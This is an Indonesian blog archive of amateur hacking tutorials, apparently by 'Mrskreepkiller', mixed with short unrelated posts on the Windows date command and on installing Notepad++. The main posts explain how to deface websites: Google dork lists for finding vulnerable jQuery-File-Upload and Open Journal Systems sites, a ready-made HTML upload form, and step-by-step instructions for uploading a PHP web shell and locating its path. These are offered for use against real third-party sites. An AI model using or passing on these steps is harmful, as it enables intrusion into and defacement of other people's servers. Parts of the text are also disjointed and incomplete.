Archive for November 2017

                                               cara deface dengan blogspot
                                         yah kita lanjut tutornya :* 
balik lagi sama saya Mrskreepkiller
mungkin pada penasaran gmn cara deface blog yah tenang 💆
langsung saja eah euh saya disini masuk ke sini eah


coppy di kolom  seperti ini
sehabis itu coppy dah script diatas tadi oke Gampang kan 
eah makasih telah kunjungi blog ini thanks 

welcome :)

Oke, saya Mrskreepkiller langsung saja tutornya yah sob ga enak lama lama

Pertama tama kita cari 
pacar 
eh salah maksudnya dorknya


Dork:
- inurl:/Jquery-File-Upload/server/
- inurl:/server/php/
- inurl:/server/php/files/
Use your brain :D

Exploit : http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/
               http://www.target.com/[path]/server/php/

CSRF:
<form method="POST" action="http://www.target.com/[path]/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
(Simpan dalam bentuk html)


Step 1
       Dorking di www.google.com / yang lainnya, disini aya memakai dork inurl:/server/php/files/

Step 2
     Cari cari dan mencari, jika sudah dapat masukan exploitnya
jika vuln maka akan terlihat seperti ini


Step 3
     Masukan url target nya pada CSRF. Setelah itu buka pada browser > klik Browse.. > Pilih shell kalian > klik Upload

Step 4
     Setelah upload shell nanti akan muncul seperti ini 
itu contoh kita berhasil upload shell :D ( kalo size nya false/file not allowed berarti gagal )


Step 5
     Akses shell http://www.target.com/[path]/server/php/files/shellkita.php

Oke, sekian tutor dari saya semoga berhasil hehe:D
NB: jika ingin tebas index disarankan jangan ya. karya orang itu lhoo. nitip file aja


Deface Metode Jquery-File-Upload



                           Hallo guys balik lagi tutor kali ini gue kasih tulisan aja yah
                     karna cmd di warnet saya rusak jadi yah kita crot cmdnya oke
     

                                       >1< buka cmd kalian>
                                                  >2<sehabis buka cmd kalian ketik'cd/
                                            >3<sehabis itu baru dah ketik'Date
                                           simple kan ;)

             
                                          selebih nya Chat di fb saya sadja oke Fatur       
                 

Cara Ubah Tanggal Di Cmd

Cara Download Notepad++

  • Tampilan Notepad++

    Notepad adalah sebuah text editor simple yang sudah ada sejak Windows 1.0 di sekitar tahun 1985, fungsi notepad dari dulu sampai sekarang dianggap masih sama saja yaitu untuk menulis pesan pendek ( bukan SMS ) notepad juga bisa menyimpan dan membaca semua program bahasa komputer.





Kali ini saya ingin membagi software dan cara mendownload nya

Nama Software:Notepad++ 

Sistem operasi: Microsoft Windows

Pengembang: Don Ho

Ditulis di: C++

Jenis: Source code editor

Rilis perdana: 24 November 2003

Lisensi: GNU General Public License

Ukuran: 2.8MB

Link Download :Klik Disini
Cara downloadnya: 
1. Buka Linknya dan download 



2.Buka file yg terdownload tadi 
   Klik Run dan pilih bahasanya bahasa indonesia lalu OK kan 




3.Klik Lanjut dan klik lagi Saya Setuju



4.Klik Lanjut ,Lanjut dan lanjut :v abis itu install



Sudah Jadii.....
 dan tampilan nya seperti ini 




Sekian dari Saya
Saya ucapkan 
Terima Kasih  banyak telah berkunjung di blog saya 

Jangan bosan bosan ya untuk berkunjung di blog saya :)
GBU ALL 














Halo Sob Jumpa Lagi dengan saya Mrskreepkiller.. Oke Kali ini saya akan Share Cara Deface website OJS (  Open Journal Systems ) ada  Yg Tau apa Itu OJS?
    
   


OJS Adalah sebuah aplikasi Journal terbuka untuk Management yang biasa di gunakan dalam pemerintah, pendidikan & lembaga lain. 

Type : Uploader File Data
    
 
Dork :
index.php/index/user/register

index/user/register/ 
user/register
index of files OJS intitle:register
"index of files" "OJS"
"index of files" "journal article"
/ojs/index.php/user/register
/journal/index.php/user/register
"journal" intext:register inurl:user/register site:.id
OpenJournal register "parent directory site:id
OpenJournal register "Index Of" site:id
/files/journals/1/articles "articles" site:id
/files/journals/1/articles "submission" site:id
/files/journals/1/articles "register" site:id
/submission/original/ "OJS"
submission/original/ "OpenJournal"
"parent directory" /files/journals/1/submission
inurl:/user/register/ "e-journal"
/files/journals/1/articles site:id    [Search BING]
index of parent directory journal article submission [Search  BING + GOOGLE]
OJS "parent directory" site:id [Search BING + GOOGLE]  

cari pacar   cari dorknya yang vuln yah

Vuln : /index.php/index/user/register ( Bisa registrasi )


1. Kamu harus mendaftar dulu disini > site,com/index.php/index/user/register
-Jangan Lupa untuk mencentang Registrasi sebabagi Author / penulis & Jangan ceklis Email konfimasi


2. Setelah Registasi Klik "New Submission"
3. Selesaikan Step 1
4. Di Step 2, kamu dapat upload shell (format shell : a.phtml)



5. Jika sukses maka seperti ini

Penjelasan : 
Filename : 4-4-1-SM.phtml
4 = id user kamu

Shell Path : 
/files/journals/1/articles/[iduser]/submission/original/[nama file].phtml

Contoh : files/journals/1/articles/4/submission/original/4-4-1-SM.phtml
mau nanya nanya silahkan kunjungi fbnya juga
nitip nick Mrskreepkiller


- Copyright © Mr.Froggy - Blogger Templates - Powered by Blogger - Designed by Johanes Djogan -